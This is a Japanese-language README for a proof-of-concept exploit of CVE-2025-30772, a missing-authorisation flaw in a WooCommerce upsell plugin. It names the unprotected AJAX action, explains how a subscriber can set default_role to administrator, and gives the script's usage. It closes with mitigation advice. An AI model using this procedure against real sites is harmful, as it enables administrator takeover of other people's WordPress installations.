
WordPress WPC Smart Upsell Funnel for WooCommerce プラグイン <= 3.0.4 - 任意のオプション更新による権限昇格の脆弱性
📅 公開日: 2025年3月27日
🔐 CVSSスコア: 8.8 (高)
🔥 CWE-862: 認可の欠如
WPC Smart Upsell Funnel for WooCommerceプラグインにおける認可の欠如脆弱性により、最小限の権限(例: subscriber)を持つ認証済みユーザーが、脆弱なAJAXエンドポイントを介してWordPressのオプションを任意に変更することで権限を昇格できます。
影響を受けるバージョン:
From: unknown
Through: 3.0.4
プラグインは以下の認証不要の特権AJAXエンドポイントを登録しています:
action: wpcuf_import_export_save
このエンドポイントはPOSTリクエストを受け付け、ユーザーの値をそのまま使用して直接 update_option() を呼び出しますが、ユーザーの権限を確認しません。
基本的なアカウント(購読者でさえ)を持つ攻撃者は次のことができます:
| オプション名 | 悪用前 | 悪用後 |
|---|---|---|
default_role | subscriber | administrator |
📌 その後、新規登録するユーザーはデフォルトで管理者になります。
このスクリプトは:
default_roleを"administrator"に変更する細工されたリクエストを送信します。usage: CVE-2025-30772.py [-h] -u URL -un USERNAME -p PASSWORD
WordPress Privilege Escalation Exploit - CVE-2025-30772 # By Nxploited | Khaled ALenazi,
options:
-h, --help show this help message and exit
-u URL, --url URL Target base URL
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
| フラグ | 説明 |
|---|---|
-u | 対象WordPressのベースURL |
-un | WordPressユーザー名 |
-p | WordPressパスワード |
アクセス前:
http://target.com/wp-admin/options.php
default_role = subscriber
悪用後:
default_role = administrator ✅
パッチが利用可能になったらすぐにプラグインを更新してください。
それまでは、/wp-admin/admin-ajax.phpへのアクセスを制限し、default_roleを監視してください。
このPoCは倫理的かつ教育目的のみのためにNxploited - Khaled Alenaziによって作成されました。